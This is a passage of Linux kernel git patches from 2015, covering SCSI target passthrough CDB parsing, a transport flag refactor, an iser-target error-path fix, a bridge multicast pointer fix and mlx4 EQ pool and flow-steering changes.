&tcmu_dev_attrib_max_unmap_block_desc_count.attr, - &tcmu_dev_attrib_unmap_granularity.attr, - &tcmu_dev_attrib_unmap_granularity_alignment.attr, - &tcmu_dev_attrib_max_write_same_len.attr, NULL, }; @@ -1094,7 +1118,7 @@ static struct se_subsystem_api tcmu_template = { .inquiry_prod = "USER", .inquiry_rev = TCMU_VERSION, .owner = THIS_MODULE, - .transport_type = TRANSPORT_PLUGIN_VHBA_PDEV, + .transport_type = TRANSPORT_PLUGIN_PHBA_PDEV, .attach_hba = tcmu_attach_hba, .detach_hba = tcmu_detach_hba, .alloc_device = tcmu_alloc_device, From 7bfea53b5c936d706d0bf60ec218fa72cde77121 Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Tue, 19 May 2015 14:44:40 -0700 Subject: [PATCH 507/872] target: Move passthrough CDB parsing into a common function Aside from whether they handle BIDI ops or not, parsing of the CDB by kernel and user SCSI passthrough modules should be identical. Move this into a new passthrough_parse_cdb() and call it from tcm-pscsi and tcm-user. 
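With the common helper in place, a passthrough backend's parse_cdb callback reduces to a single call; pscsi, which still rejects BIDI, ends up as shown in the hunk below:

  static sense_reason_t
  pscsi_parse_cdb(struct se_cmd *cmd)
  {
          if (cmd->se_cmd_flags & SCF_BIDI)
                  return TCM_UNSUPPORTED_SCSI_OPCODE;

          return passthrough_parse_cdb(cmd, pscsi_execute_cmd);
  }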
Reported-by: Christoph Hellwig Reviewed-by: Ilias Tsitsimpis Signed-off-by: Andy Grover Signed-off-by: Nicholas Bellinger --- drivers/target/target_core_device.c | 74 ++++++++++++++++++++++++++++ drivers/target/target_core_pscsi.c | 53 +------------------- drivers/target/target_core_user.c | 43 +--------------- include/target/target_core_backend.h | 2 + 4 files changed, 78 insertions(+), 94 deletions(-) diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c index 7faa6aef9a4d..56b20dc54087 100644 --- a/drivers/target/target_core_device.c +++ b/drivers/target/target_core_device.c @@ -33,6 +33,7 @@ #include #include #include +#include #include #include #include @@ -1707,3 +1708,76 @@ void core_dev_release_virtual_lun0(void) target_free_device(g_lun0_dev); core_delete_hba(hba); } + +/* + * Common CDB parsing for kernel and user passthrough. + */ +sense_reason_t +passthrough_parse_cdb(struct se_cmd *cmd, + sense_reason_t (*exec_cmd)(struct se_cmd *cmd)) +{ + unsigned char *cdb = cmd->t_task_cdb; + + /* + * Clear a lun set in the cdb if the initiator talking to use spoke + * and old standards version, as we can't assume the underlying device + * won't choke up on it. + */ + switch (cdb[0]) { + case READ_10: /* SBC - RDProtect */ + case READ_12: /* SBC - RDProtect */ + case READ_16: /* SBC - RDProtect */ + case SEND_DIAGNOSTIC: /* SPC - SELF-TEST Code */ + case VERIFY: /* SBC - VRProtect */ + case VERIFY_16: /* SBC - VRProtect */ + case WRITE_VERIFY: /* SBC - VRProtect */ + case WRITE_VERIFY_12: /* SBC - VRProtect */ + case MAINTENANCE_IN: /* SPC - Parameter Data Format for SA RTPG */ + break; + default: + cdb[1] &= 0x1f; /* clear logical unit number */ + break; + } + + /* + * For REPORT LUNS we always need to emulate the response, for everything + * else, pass it up. + */ + if (cdb[0] == REPORT_LUNS) { + cmd->execute_cmd = spc_emulate_report_luns; + return TCM_NO_SENSE; + } + + /* Set DATA_CDB flag for ops that should have it */ + switch (cdb[0]) { + case READ_6: + case READ_10: + case READ_12: + case READ_16: + case WRITE_6: + case WRITE_10: + case WRITE_12: + case WRITE_16: + case WRITE_VERIFY: + case WRITE_VERIFY_12: + case 0x8e: /* WRITE_VERIFY_16 */ + case COMPARE_AND_WRITE: + case XDWRITEREAD_10: + cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; + break; + case VARIABLE_LENGTH_CMD: + switch (get_unaligned_be16(&cdb[8])) { + case READ_32: + case WRITE_32: + case 0x0c: /* WRITE_VERIFY_32 */ + case XDWRITEREAD_32: + cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; + break; + } + } + + cmd->execute_cmd = exec_cmd; + + return TCM_NO_SENSE; +} +EXPORT_SYMBOL(passthrough_parse_cdb); diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c index 4073869d2090..53bd0eb57095 100644 --- a/drivers/target/target_core_pscsi.c +++ b/drivers/target/target_core_pscsi.c @@ -973,64 +973,13 @@ pscsi_map_sg(struct se_cmd *cmd, struct scatterlist *sgl, u32 sgl_nents, return TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE; } -/* - * Clear a lun set in the cdb if the initiator talking to use spoke - * and old standards version, as we can't assume the underlying device - * won't choke up on it. 
- */ -static inline void pscsi_clear_cdb_lun(unsigned char *cdb) -{ - switch (cdb[0]) { - case READ_10: /* SBC - RDProtect */ - case READ_12: /* SBC - RDProtect */ - case READ_16: /* SBC - RDProtect */ - case SEND_DIAGNOSTIC: /* SPC - SELF-TEST Code */ - case VERIFY: /* SBC - VRProtect */ - case VERIFY_16: /* SBC - VRProtect */ - case WRITE_VERIFY: /* SBC - VRProtect */ - case WRITE_VERIFY_12: /* SBC - VRProtect */ - case MAINTENANCE_IN: /* SPC - Parameter Data Format for SA RTPG */ - break; - default: - cdb[1] &= 0x1f; /* clear logical unit number */ - break; - } -} - static sense_reason_t pscsi_parse_cdb(struct se_cmd *cmd) { - unsigned char *cdb = cmd->t_task_cdb; - if (cmd->se_cmd_flags & SCF_BIDI) return TCM_UNSUPPORTED_SCSI_OPCODE; - pscsi_clear_cdb_lun(cdb); - - /* - * For REPORT LUNS we always need to emulate the response, for everything - * else the default for pSCSI is to pass the command to the underlying - * LLD / physical hardware. - */ - switch (cdb[0]) { - case REPORT_LUNS: - cmd->execute_cmd = spc_emulate_report_luns; - return 0; - case READ_6: - case READ_10: - case READ_12: - case READ_16: - case WRITE_6: - case WRITE_10: - case WRITE_12: - case WRITE_16: - case WRITE_VERIFY: - cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; - /* FALLTHROUGH*/ - default: - cmd->execute_cmd = pscsi_execute_cmd; - return 0; - } + return passthrough_parse_cdb(cmd, pscsi_execute_cmd); } static sense_reason_t diff --git a/drivers/target/target_core_user.c b/drivers/target/target_core_user.c index 90e084ea7b92..2768ea2cfd7a 100644 --- a/drivers/target/target_core_user.c +++ b/drivers/target/target_core_user.c @@ -1049,48 +1049,7 @@ tcmu_pass_op(struct se_cmd *se_cmd) static sense_reason_t tcmu_parse_cdb(struct se_cmd *cmd) { - unsigned char *cdb = cmd->t_task_cdb; - - /* - * For REPORT LUNS we always need to emulate the response, for everything - * else, pass it up. 
- */ - if (cdb[0] == REPORT_LUNS) { - cmd->execute_cmd = spc_emulate_report_luns; - return TCM_NO_SENSE; - } - - /* Set DATA_CDB flag for ops that should have it */ - switch (cdb[0]) { - case READ_6: - case READ_10: - case READ_12: - case READ_16: - case WRITE_6: - case WRITE_10: - case WRITE_12: - case WRITE_16: - case WRITE_VERIFY: - case WRITE_VERIFY_12: - case 0x8e: /* WRITE_VERIFY_16 */ - case COMPARE_AND_WRITE: - case XDWRITEREAD_10: - cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; - break; - case VARIABLE_LENGTH_CMD: - switch (get_unaligned_be16(&cdb[8])) { - case READ_32: - case WRITE_32: - case 0x0c: /* WRITE_VERIFY_32 */ - case XDWRITEREAD_32: - cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; - break; - } - } - - cmd->execute_cmd = tcmu_pass_op; - - return TCM_NO_SENSE; + return passthrough_parse_cdb(cmd, tcmu_pass_op); } DEF_TB_DEV_ATTRIB_RO(tcmu, hw_pi_prot_type); diff --git a/include/target/target_core_backend.h b/include/target/target_core_backend.h index d61be7297b2c..563e11970152 100644 --- a/include/target/target_core_backend.h +++ b/include/target/target_core_backend.h @@ -138,5 +138,7 @@ int se_dev_set_queue_depth(struct se_device *, u32); int se_dev_set_max_sectors(struct se_device *, u32); int se_dev_set_optimal_sectors(struct se_device *, u32); int se_dev_set_block_size(struct se_device *, u32); +sense_reason_t passthrough_parse_cdb(struct se_cmd *cmd, + sense_reason_t (*exec_cmd)(struct se_cmd *cmd)); #endif /* TARGET_CORE_BACKEND_H */ From a3541703ebbf99d499656b15987175f6579b42ac Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Tue, 19 May 2015 14:44:41 -0700 Subject: [PATCH 508/872] target: Use a PASSTHROUGH flag instead of transport_types It seems like we only care if a transport is passthrough or not. Convert transport_type to a flags field and replace TRANSPORT_PLUGIN_* with a flag, TRANSPORT_FLAG_PASSTHROUGH. 
Signed-off-by: Andy Grover Reviewed-by: Ilias Tsitsimpis Signed-off-by: Nicholas Bellinger --- drivers/target/target_core_alua.c | 4 ++-- drivers/target/target_core_configfs.c | 10 +++++----- drivers/target/target_core_device.c | 4 ++-- drivers/target/target_core_file.c | 1 - drivers/target/target_core_iblock.c | 1 - drivers/target/target_core_pr.c | 2 +- drivers/target/target_core_pscsi.c | 2 +- drivers/target/target_core_rd.c | 1 - drivers/target/target_core_transport.c | 6 +++--- drivers/target/target_core_user.c | 2 +- include/target/target_core_backend.h | 6 ++---- 11 files changed, 17 insertions(+), 22 deletions(-) diff --git a/drivers/target/target_core_alua.c b/drivers/target/target_core_alua.c index 75cbde1f7c5b..4f8d4d459aa4 100644 --- a/drivers/target/target_core_alua.c +++ b/drivers/target/target_core_alua.c @@ -704,7 +704,7 @@ target_alua_state_check(struct se_cmd *cmd) if (dev->se_hba->hba_flags & HBA_FLAGS_INTERNAL_USE) return 0; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; if (!port) @@ -2377,7 +2377,7 @@ ssize_t core_alua_store_secondary_write_metadata( int core_setup_alua(struct se_device *dev) { - if (dev->transport->transport_type != TRANSPORT_PLUGIN_PHBA_PDEV && + if (!(dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) && !(dev->se_hba->hba_flags & HBA_FLAGS_INTERNAL_USE)) { struct t10_alua_lu_gp_member *lu_gp_mem; diff --git a/drivers/target/target_core_configfs.c b/drivers/target/target_core_configfs.c index 1580077971f8..e7b0430a0575 100644 --- a/drivers/target/target_core_configfs.c +++ b/drivers/target/target_core_configfs.c @@ -811,7 +811,7 @@ static ssize_t target_core_dev_pr_show_attr_res_holder(struct se_device *dev, { int ret; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return sprintf(page, "Passthrough\n"); spin_lock(&dev->dev_reservation_lock); @@ -962,7 +962,7 @@ SE_DEV_PR_ATTR_RO(res_pr_type); static ssize_t target_core_dev_pr_show_attr_res_type( struct se_device *dev, char *page) { - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return sprintf(page, "SPC_PASSTHROUGH\n"); else if (dev->dev_reservation_flags & DRF_SPC2_RESERVATIONS) return sprintf(page, "SPC2_RESERVATIONS\n"); @@ -975,7 +975,7 @@ SE_DEV_PR_ATTR_RO(res_type); static ssize_t target_core_dev_pr_show_attr_res_aptpl_active( struct se_device *dev, char *page) { - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; return sprintf(page, "APTPL Bit Status: %s\n", @@ -990,7 +990,7 @@ SE_DEV_PR_ATTR_RO(res_aptpl_active); static ssize_t target_core_dev_pr_show_attr_res_aptpl_metadata( struct se_device *dev, char *page) { - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; return sprintf(page, "Ready to process PR APTPL metadata..\n"); @@ -1037,7 +1037,7 @@ static ssize_t target_core_dev_pr_store_attr_res_aptpl_metadata( u16 port_rpti = 0, tpgt = 0; u8 type = 0, scope; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; if (dev->dev_reservation_flags & DRF_SPC2_RESERVATIONS) return 0; diff --git a/drivers/target/target_core_device.c 
b/drivers/target/target_core_device.c index 56b20dc54087..ce5f768181ff 100644 --- a/drivers/target/target_core_device.c +++ b/drivers/target/target_core_device.c @@ -528,7 +528,7 @@ static void core_export_port( list_add_tail(&port->sep_list, &dev->dev_sep_list); spin_unlock(&dev->se_port_lock); - if (dev->transport->transport_type != TRANSPORT_PLUGIN_PHBA_PDEV && + if (!(dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) && !(dev->se_hba->hba_flags & HBA_FLAGS_INTERNAL_USE)) { tg_pt_gp_mem = core_alua_allocate_tg_pt_gp_mem(port); if (IS_ERR(tg_pt_gp_mem) || !tg_pt_gp_mem) { @@ -1604,7 +1604,7 @@ int target_configure_device(struct se_device *dev) * anything virtual (IBLOCK, FILEIO, RAMDISK), but not for TCM/pSCSI * passthrough because this is being provided by the backend LLD. */ - if (dev->transport->transport_type != TRANSPORT_PLUGIN_PHBA_PDEV) { + if (!(dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH)) { strncpy(&dev->t10_wwn.vendor[0], "LIO-ORG", 8); strncpy(&dev->t10_wwn.model[0], dev->transport->inquiry_prod, 16); diff --git a/drivers/target/target_core_file.c b/drivers/target/target_core_file.c index f7e6e51aed36..3f27bfd816d8 100644 --- a/drivers/target/target_core_file.c +++ b/drivers/target/target_core_file.c @@ -958,7 +958,6 @@ static struct se_subsystem_api fileio_template = { .inquiry_prod = "FILEIO", .inquiry_rev = FD_VERSION, .owner = THIS_MODULE, - .transport_type = TRANSPORT_PLUGIN_VHBA_PDEV, .attach_hba = fd_attach_hba, .detach_hba = fd_detach_hba, .alloc_device = fd_alloc_device, diff --git a/drivers/target/target_core_iblock.c b/drivers/target/target_core_iblock.c index 1b7947c2510f..8c965683789f 100644 --- a/drivers/target/target_core_iblock.c +++ b/drivers/target/target_core_iblock.c @@ -904,7 +904,6 @@ static struct se_subsystem_api iblock_template = { .inquiry_prod = "IBLOCK", .inquiry_rev = IBLOCK_VERSION, .owner = THIS_MODULE, - .transport_type = TRANSPORT_PLUGIN_VHBA_PDEV, .attach_hba = iblock_attach_hba, .detach_hba = iblock_detach_hba, .alloc_device = iblock_alloc_device, diff --git a/drivers/target/target_core_pr.c b/drivers/target/target_core_pr.c index b7c81acf08d0..a15411c79ae9 100644 --- a/drivers/target/target_core_pr.c +++ b/drivers/target/target_core_pr.c @@ -4093,7 +4093,7 @@ target_check_reservation(struct se_cmd *cmd) return 0; if (dev->se_hba->hba_flags & HBA_FLAGS_INTERNAL_USE) return 0; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; spin_lock(&dev->dev_reservation_lock); diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c index 53bd0eb57095..ecc5eaef13d6 100644 --- a/drivers/target/target_core_pscsi.c +++ b/drivers/target/target_core_pscsi.c @@ -1141,7 +1141,7 @@ static struct configfs_attribute *pscsi_backend_dev_attrs[] = { static struct se_subsystem_api pscsi_template = { .name = "pscsi", .owner = THIS_MODULE, - .transport_type = TRANSPORT_PLUGIN_PHBA_PDEV, + .transport_flags = TRANSPORT_FLAG_PASSTHROUGH, .attach_hba = pscsi_attach_hba, .detach_hba = pscsi_detach_hba, .pmode_enable_hba = pscsi_pmode_enable_hba, diff --git a/drivers/target/target_core_rd.c b/drivers/target/target_core_rd.c index a263bf5fab8d..d16489b6a1a4 100644 --- a/drivers/target/target_core_rd.c +++ b/drivers/target/target_core_rd.c @@ -733,7 +733,6 @@ static struct se_subsystem_api rd_mcp_template = { .name = "rd_mcp", .inquiry_prod = "RAMDISK-MCP", .inquiry_rev = RD_MCP_VERSION, - .transport_type = 
TRANSPORT_PLUGIN_VHBA_VDEV, .attach_hba = rd_attach_hba, .detach_hba = rd_detach_hba, .alloc_device = rd_alloc_device, diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c index 90c92f04a586..675f2d9d1f14 100644 --- a/drivers/target/target_core_transport.c +++ b/drivers/target/target_core_transport.c @@ -1196,7 +1196,7 @@ transport_check_alloc_task_attr(struct se_cmd *cmd) * Check if SAM Task Attribute emulation is enabled for this * struct se_device storage object */ - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; if (cmd->sam_task_attr == TCM_ACA_TAG) { @@ -1787,7 +1787,7 @@ static bool target_handle_task_attr(struct se_cmd *cmd) { struct se_device *dev = cmd->se_dev; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return false; /* @@ -1912,7 +1912,7 @@ static void transport_complete_task_attr(struct se_cmd *cmd) { struct se_device *dev = cmd->se_dev; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return; if (cmd->sam_task_attr == TCM_SIMPLE_TAG) { diff --git a/drivers/target/target_core_user.c b/drivers/target/target_core_user.c index 2768ea2cfd7a..07d2996d8c1f 100644 --- a/drivers/target/target_core_user.c +++ b/drivers/target/target_core_user.c @@ -1077,7 +1077,7 @@ static struct se_subsystem_api tcmu_template = { .inquiry_prod = "USER", .inquiry_rev = TCMU_VERSION, .owner = THIS_MODULE, - .transport_type = TRANSPORT_PLUGIN_PHBA_PDEV, + .transport_flags = TRANSPORT_FLAG_PASSTHROUGH, .attach_hba = tcmu_attach_hba, .detach_hba = tcmu_detach_hba, .alloc_device = tcmu_alloc_device, diff --git a/include/target/target_core_backend.h b/include/target/target_core_backend.h index 563e11970152..5f1225706993 100644 --- a/include/target/target_core_backend.h +++ b/include/target/target_core_backend.h @@ -1,9 +1,7 @@ #ifndef TARGET_CORE_BACKEND_H #define TARGET_CORE_BACKEND_H -#define TRANSPORT_PLUGIN_PHBA_PDEV 1 -#define TRANSPORT_PLUGIN_VHBA_PDEV 2 -#define TRANSPORT_PLUGIN_VHBA_VDEV 3 +#define TRANSPORT_FLAG_PASSTHROUGH 1 struct target_backend_cits { struct config_item_type tb_dev_cit; @@ -22,7 +20,7 @@ struct se_subsystem_api { char inquiry_rev[4]; struct module *owner; - u8 transport_type; + u8 transport_flags; int (*attach_hba)(struct se_hba *, u32); void (*detach_hba)(struct se_hba *); From b2feda4feb1b0ea74c0916b4a35b038bbfef9c82 Mon Sep 17 00:00:00 2001 From: Roland Dreier Date: Fri, 29 May 2015 23:12:10 -0700 Subject: [PATCH 509/872] iser-target: Fix error path in isert_create_pi_ctx() We don't assign pi_ctx to desc->pi_ctx until we're certain to succeed in the function. That means the cleanup path should use the local pi_ctx variable, not desc->pi_ctx. This was detected by Coverity (CID 1260062). 
Signed-off-by: Roland Dreier Signed-off-by: Nicholas Bellinger --- drivers/infiniband/ulp/isert/ib_isert.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c index 327529ee85eb..3f40319a55da 100644 --- a/drivers/infiniband/ulp/isert/ib_isert.c +++ b/drivers/infiniband/ulp/isert/ib_isert.c @@ -547,11 +547,11 @@ isert_create_pi_ctx(struct fast_reg_descriptor *desc, return 0; err_prot_mr: - ib_dereg_mr(desc->pi_ctx->prot_mr); + ib_dereg_mr(pi_ctx->prot_mr); err_prot_frpl: - ib_free_fast_reg_page_list(desc->pi_ctx->prot_frpl); + ib_free_fast_reg_page_list(pi_ctx->prot_frpl); err_pi_ctx: - kfree(desc->pi_ctx); + kfree(pi_ctx); return ret; } From 71d9f6149cac8fc6646adfb2a6f3b0de6ddd23f6 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Thu, 28 May 2015 04:42:54 -0700 Subject: [PATCH 510/872] bridge: fix br_multicast_query_expired() bug MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit br_multicast_query_expired() querier argument is a pointer to a struct bridge_mcast_querier : struct bridge_mcast_querier { struct br_ip addr; struct net_bridge_port __rcu *port; }; Intent of the code was to clear port field, not the pointer to querier. Fixes: 2cd4143192e8 ("bridge: memorize and export selected IGMP/MLD querier port") Signed-off-by: Eric Dumazet Acked-by: Thadeu Lima de Souza Cascardo Acked-by: Linus Lüssing Cc: Linus Lüssing Cc: Steinar H. Gunderson Signed-off-by: David S. Miller --- net/bridge/br_multicast.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/bridge/br_multicast.c b/net/bridge/br_multicast.c index a3abe6ed111e..22fd0419b314 100644 --- a/net/bridge/br_multicast.c +++ b/net/bridge/br_multicast.c @@ -1822,7 +1822,7 @@ static void br_multicast_query_expired(struct net_bridge *br, if (query->startup_sent < br->multicast_startup_query_count) query->startup_sent++; - RCU_INIT_POINTER(querier, NULL); + RCU_INIT_POINTER(querier->port, NULL); br_multicast_send_query(br, NULL, query); spin_unlock(&br->multicast_lock); } From 48564135cba806bd0d6d1704c0ea317318966d9f Mon Sep 17 00:00:00 2001 From: Matan Barak Date: Sun, 31 May 2015 09:30:15 +0300 Subject: [PATCH 511/872] net/mlx4_core: Demote simple multicast and broadcast flow steering rules In SRIOV, when simple (i.e - Ethernet L2 only) flow steering rules are created, always create them at MLX4_DOMAIN_NIC priority (instead of the real priority the function created them at). This is done in order to let multiple functions add broadcast/multicast rules without affecting other functions, which is necessary for DPDK in SRIOV. Signed-off-by: Matan Barak Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx4/main.c | 4 ++-- .../ethernet/mellanox/mlx4/resource_tracker.c | 23 +++++++++++++++++++ 2 files changed, 25 insertions(+), 2 deletions(-) diff --git a/drivers/infiniband/hw/mlx4/main.c b/drivers/infiniband/hw/mlx4/main.c index cc64400d41ac..8c96c71e7bab 100644 --- a/drivers/infiniband/hw/mlx4/main.c +++ b/drivers/infiniband/hw/mlx4/main.c @@ -1090,7 +1090,7 @@ static int __mlx4_ib_create_flow(struct ib_qp *qp, struct ib_flow_attr *flow_att ret = mlx4_cmd_imm(mdev->dev, mailbox->dma, reg_id, size >> 2, 0, MLX4_QP_FLOW_STEERING_ATTACH, MLX4_CMD_TIME_CLASS_A, - MLX4_CMD_NATIVE); + MLX4_CMD_WRAPPED); if (ret == -ENOMEM) pr_err("mcg table is full. 
Fail to register network rule.\n"); else if (ret == -ENXIO) @@ -1107,7 +1107,7 @@ static int __mlx4_ib_destroy_flow(struct mlx4_dev *dev, u64 reg_id) int err; err = mlx4_cmd(dev, reg_id, 0, 0, MLX4_QP_FLOW_STEERING_DETACH, MLX4_CMD_TIME_CLASS_A, - MLX4_CMD_NATIVE); + MLX4_CMD_WRAPPED); if (err) pr_err("Fail to detach network rule. registration id = 0x%llx\n", reg_id); diff --git a/drivers/net/ethernet/mellanox/mlx4/resource_tracker.c b/drivers/net/ethernet/mellanox/mlx4/resource_tracker.c index 15ec08181658..ab48386bfefc 100644 --- a/drivers/net/ethernet/mellanox/mlx4/resource_tracker.c +++ b/drivers/net/ethernet/mellanox/mlx4/resource_tracker.c @@ -3973,6 +3973,22 @@ static int validate_eth_header_mac(int slave, struct _rule_hw *eth_header, return 0; } +static void handle_eth_header_mcast_prio(struct mlx4_net_trans_rule_hw_ctrl *ctrl, + struct _rule_hw *eth_header) +{ + if (is_multicast_ether_addr(eth_header->eth.dst_mac) || + is_broadcast_ether_addr(eth_header->eth.dst_mac)) { + struct mlx4_net_trans_rule_hw_eth *eth = + (struct mlx4_net_trans_rule_hw_eth *)eth_header; + struct _rule_hw *next_rule = (struct _rule_hw *)(eth + 1); + bool last_rule = next_rule->size == 0 && next_rule->id == 0 && + next_rule->rsvd == 0; + + if (last_rule) + ctrl->prio = cpu_to_be16(MLX4_DOMAIN_NIC); + } +} + /* * In case of missing eth header, append eth header with a MAC address * assigned to the VF. @@ -4125,6 +4141,12 @@ int mlx4_QP_FLOW_STEERING_ATTACH_wrapper(struct mlx4_dev *dev, int slave, rule_header = (struct _rule_hw *)(ctrl + 1); header_id = map_hw_to_sw_id(be16_to_cpu(rule_header->id)); + if (header_id == MLX4_NET_TRANS_RULE_ID_ETH) + handle_eth_header_mcast_prio(ctrl, rule_header); + + if (slave == dev->caps.function) + goto execute; + switch (header_id) { case MLX4_NET_TRANS_RULE_ID_ETH: if (validate_eth_header_mac(slave, rule_header, rlist)) { @@ -4151,6 +4173,7 @@ int mlx4_QP_FLOW_STEERING_ATTACH_wrapper(struct mlx4_dev *dev, int slave, goto err_put; } +execute: err = mlx4_cmd_imm(dev, inbox->dma, &vhcr->out_param, vhcr->in_modifier, 0, MLX4_QP_FLOW_STEERING_ATTACH, MLX4_CMD_TIME_CLASS_A, From c66fa19c405a36673d4aab13658c8246413d5c0f Mon Sep 17 00:00:00 2001 From: Matan Barak Date: Sun, 31 May 2015 09:30:16 +0300 Subject: [PATCH 512/872] net/mlx4: Add EQ pool Previously, mlx4_en allocated EQs and used them exclusively. This affected RoCE performance, as applications which are events sensitive were limited to use only the legacy EQs. Change that by introducing an EQ pool. This pool is managed by mlx4_core. EQs are assigned to ports (when there are limited number of EQs, multiple ports could be assigned to the same EQs). An exception to this rule is the ASYNC EQ which handles various events. Legacy EQs are completely removed as all EQs could be shared. When a consumer (mlx4_ib/mlx4_en) requests an EQ, it asks for EQ serving on a specific port. The core driver calculates which EQ should be assigned to that request. Because IRQs are shared between IB and Ethernet modules, their names only include the PCI device BDF address. Signed-off-by: Matan Barak Signed-off-by: Ido Shamay Signed-off-by: Or Gerlitz Signed-off-by: David S. 
Miller --- drivers/infiniband/hw/mlx4/main.c | 71 ++-- drivers/infiniband/hw/mlx4/mlx4_ib.h | 1 - drivers/net/ethernet/mellanox/mlx4/cq.c | 10 +- drivers/net/ethernet/mellanox/mlx4/en_cq.c | 48 ++- .../net/ethernet/mellanox/mlx4/en_netdev.c | 7 +- drivers/net/ethernet/mellanox/mlx4/en_rx.c | 13 +- drivers/net/ethernet/mellanox/mlx4/eq.c | 353 +++++++++++------- drivers/net/ethernet/mellanox/mlx4/main.c | 74 +++- drivers/net/ethernet/mellanox/mlx4/mlx4.h | 11 +- drivers/net/ethernet/mellanox/mlx4/mlx4_en.h | 2 +- include/linux/mlx4/device.h | 11 +- 11 files changed, 342 insertions(+), 259 deletions(-) diff --git a/drivers/infiniband/hw/mlx4/main.c b/drivers/infiniband/hw/mlx4/main.c index 8c96c71e7bab..024b0f745035 100644 --- a/drivers/infiniband/hw/mlx4/main.c +++ b/drivers/infiniband/hw/mlx4/main.c @@ -2041,77 +2041,52 @@ static void init_pkeys(struct mlx4_ib_dev *ibdev) static void mlx4_ib_alloc_eqs(struct mlx4_dev *dev, struct mlx4_ib_dev *ibdev) { - char name[80]; - int eq_per_port = 0; - int added_eqs = 0; - int total_eqs = 0; - int i, j, eq; - - /* Legacy mode or comp_pool is not large enough */ - if (dev->caps.comp_pool == 0 || - dev->caps.num_ports > dev->caps.comp_pool) - return; - - eq_per_port = dev->caps.comp_pool / dev->caps.num_ports; - - /* Init eq table */ - added_eqs = 0; - mlx4_foreach_port(i, dev, MLX4_PORT_TYPE_IB) - added_eqs += eq_per_port; - - total_eqs = dev->caps.num_comp_vectors + added_eqs; + int i, j, eq = 0, total_eqs = 0; - ibdev->eq_table = kzalloc(total_eqs * sizeof(int), GFP_KERNEL); + ibdev->eq_table = kcalloc(dev->caps.num_comp_vectors, + sizeof(ibdev->eq_table[0]), GFP_KERNEL); if (!ibdev->eq_table) return; - ibdev->eq_added = added_eqs; - - eq = 0; - mlx4_foreach_port(i, dev, MLX4_PORT_TYPE_IB) { - for (j = 0; j < eq_per_port; j++) { - snprintf(name, sizeof(name), "mlx4-ib-%d-%d@%s", - i, j, dev->persist->pdev->bus->name); - /* Set IRQ for specific name (per ring) */ - if (mlx4_assign_eq(dev, name, NULL, - &ibdev->eq_table[eq])) { - /* Use legacy (same as mlx4_en driver) */ - pr_warn("Can't allocate EQ %d; reverting to legacy\n", eq); - ibdev->eq_table[eq] = - (eq % dev->caps.num_comp_vectors); - } - eq++; + for (i = 1; i <= dev->caps.num_ports; i++) { + for (j = 0; j < mlx4_get_eqs_per_port(dev, i); + j++, total_eqs++) { + if (i > 1 && mlx4_is_eq_shared(dev, total_eqs)) + continue; + ibdev->eq_table[eq] = total_eqs; + if (!mlx4_assign_eq(dev, i, + &ibdev->eq_table[eq])) + eq++; + else + ibdev->eq_table[eq] = -1; } } - /* Fill the reset of the vector with legacy EQ */ - for (i = 0, eq = added_eqs; i < dev->caps.num_comp_vectors; i++) - ibdev->eq_table[eq++] = i; + for (i = eq; i < dev->caps.num_comp_vectors; + ibdev->eq_table[i++] = -1) + ; /* Advertise the new number of EQs to clients */ - ibdev->ib_dev.num_comp_vectors = total_eqs; + ibdev->ib_dev.num_comp_vectors = eq; } static void mlx4_ib_free_eqs(struct mlx4_dev *dev, struct mlx4_ib_dev *ibdev) { int i; + int total_eqs = ibdev->ib_dev.num_comp_vectors; - /* no additional eqs were added */ + /* no eqs were allocated */ if (!ibdev->eq_table) return; /* Reset the advertised EQ number */ - ibdev->ib_dev.num_comp_vectors = dev->caps.num_comp_vectors; + ibdev->ib_dev.num_comp_vectors = 0; - /* Free only the added eqs */ - for (i = 0; i < ibdev->eq_added; i++) { - /* Don't free legacy eqs if used */ - if (ibdev->eq_table[i] 